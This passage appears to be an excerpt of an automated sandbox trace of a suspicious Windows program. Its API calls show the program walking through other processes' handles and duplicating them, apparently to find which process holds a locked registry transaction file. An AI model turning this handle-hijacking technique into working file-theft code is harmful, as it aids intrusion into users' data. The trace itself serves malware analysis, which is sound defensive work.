out: lpThreadId=0x0) returned 0x670 [0154.184] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.186] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.186] CloseHandle (hObject=0x670) returned 1 [0154.186] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.186] CloseHandle (hObject=0x680) returned 1 [0154.186] CloseHandle (hObject=0x62c) returned 1 [0154.186] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0154.186] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.187] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.188] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.188] CloseHandle (hObject=0x670) returned 1 [0154.188] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.188] CloseHandle (hObject=0x680) returned 1 [0154.188] CloseHandle (hObject=0x62c) returned 1 [0154.188] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0154.188] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.189] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.189] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.190] CloseHandle (hObject=0x670) returned 1 [0154.190] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.190] CloseHandle (hObject=0x680) returned 1 [0154.190] CloseHandle (hObject=0x62c) returned 1 [0154.190] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0154.190] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.190] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.191] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.191] CloseHandle (hObject=0x670) returned 1 [0154.191] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.191] CloseHandle (hObject=0x680) returned 1 [0154.191] CloseHandle (hObject=0x62c) returned 1 [0154.191] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0154.191] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.192] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.193] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.193] CloseHandle (hObject=0x670) returned 1 [0154.193] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0154.193] CloseHandle (hObject=0x680) returned 1 [0154.193] CloseHandle (hObject=0x62c) returned 1 [0154.193] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0154.193] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.194] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.195] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.195] CloseHandle (hObject=0x670) returned 1 [0154.195] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.195] CloseHandle (hObject=0x680) returned 1 [0154.195] CloseHandle (hObject=0x62c) returned 1 [0154.195] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0154.195] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.196] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.197] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.197] CloseHandle (hObject=0x670) returned 1 [0154.197] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0154.197] CloseHandle (hObject=0x680) returned 1 [0154.197] CloseHandle (hObject=0x62c) returned 1 [0154.197] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0154.197] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.198] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.198] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.198] CloseHandle (hObject=0x670) returned 1 [0154.198] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.198] CloseHandle (hObject=0x680) returned 1 [0154.198] CloseHandle (hObject=0x62c) returned 1 [0154.198] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0154.198] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.199] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.200] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.200] CloseHandle (hObject=0x670) returned 1 [0154.200] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0154.200] CloseHandle (hObject=0x680) returned 1 [0154.200] CloseHandle (hObject=0x62c) returned 1 [0154.200] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0154.200] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.201] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.203] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.203] CloseHandle (hObject=0x670) returned 1 [0154.203] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.203] CloseHandle (hObject=0x680) returned 1 [0154.203] CloseHandle (hObject=0x62c) returned 1 [0154.203] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0154.203] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.204] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.205] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.205] CloseHandle (hObject=0x670) returned 1 [0154.205] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.205] CloseHandle (hObject=0x680) returned 1 [0154.205] CloseHandle (hObject=0x62c) returned 1 [0154.205] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0154.206] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.206] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.207] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.207] CloseHandle (hObject=0x670) returned 1 [0154.207] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.207] CloseHandle (hObject=0x680) returned 1 [0154.207] CloseHandle (hObject=0x62c) returned 1 [0154.207] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0154.207] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.208] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.209] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.209] CloseHandle (hObject=0x670) returned 1 [0154.209] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.209] CloseHandle (hObject=0x680) returned 1 [0154.209] CloseHandle (hObject=0x62c) returned 1 [0154.209] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0154.209] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.210] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.210] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.210] CloseHandle (hObject=0x670) returned 1 [0154.210] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.210] CloseHandle (hObject=0x680) returned 1 [0154.211] CloseHandle (hObject=0x62c) returned 1 [0154.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0154.211] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.211] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.212] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.212] CloseHandle (hObject=0x670) returned 1 [0154.212] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0154.212] CloseHandle (hObject=0x680) returned 1 [0154.212] CloseHandle (hObject=0x62c) returned 1 [0154.212] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0154.212] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.213] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.214] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.214] CloseHandle (hObject=0x670) returned 1 [0154.214] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.214] CloseHandle (hObject=0x680) returned 1 [0154.214] CloseHandle (hObject=0x62c) returned 1 [0154.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0154.214] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.215] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.215] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.215] CloseHandle (hObject=0x670) returned 1 [0154.215] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0154.215] CloseHandle (hObject=0x680) returned 1 [0154.215] CloseHandle (hObject=0x62c) returned 1 [0154.215] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0154.215] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.216] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.217] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.217] CloseHandle (hObject=0x670) returned 1 [0154.217] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.217] CloseHandle (hObject=0x680) returned 1 [0154.217] CloseHandle (hObject=0x62c) returned 1 [0154.217] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0154.217] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.218] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.218] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.219] CloseHandle (hObject=0x670) returned 1 [0154.219] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.219] CloseHandle (hObject=0x680) returned 1 [0154.219] CloseHandle (hObject=0x62c) returned 1 [0154.219] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0154.219] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.219] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.219] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.220] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.220] CloseHandle (hObject=0x670) returned 1 [0154.220] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.220] CloseHandle (hObject=0x680) returned 1 [0154.220] CloseHandle (hObject=0x62c) returned 1 [0154.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0154.220] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.221] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.222] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.222] CloseHandle (hObject=0x670) returned 1 [0154.222] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.222] CloseHandle (hObject=0x680) returned 1 [0154.222] CloseHandle (hObject=0x62c) returned 1 [0154.222] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0154.222] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.223] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.223] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.223] CloseHandle (hObject=0x670) returned 1 [0154.223] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.223] CloseHandle (hObject=0x680) returned 1 [0154.223] CloseHandle (hObject=0x62c) returned 1 [0154.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0154.224] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.224] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.225] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.225] CloseHandle (hObject=0x670) returned 1 [0154.225] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.225] CloseHandle (hObject=0x680) returned 1 [0154.225] CloseHandle (hObject=0x62c) returned 1 [0154.225] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0154.225] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.229] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.231] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.231] CloseHandle (hObject=0x670) returned 1 [0154.231] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.231] CloseHandle (hObject=0x680) returned 1 [0154.231] CloseHandle (hObject=0x62c) returned 1 [0154.231] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0154.231] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.232] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.232] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.233] CloseHandle (hObject=0x670) returned 1 [0154.233] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.233] CloseHandle (hObject=0x680) returned 1 [0154.233] CloseHandle (hObject=0x62c) returned 1 [0154.233] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0154.233] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.233] WaitForSingleObject 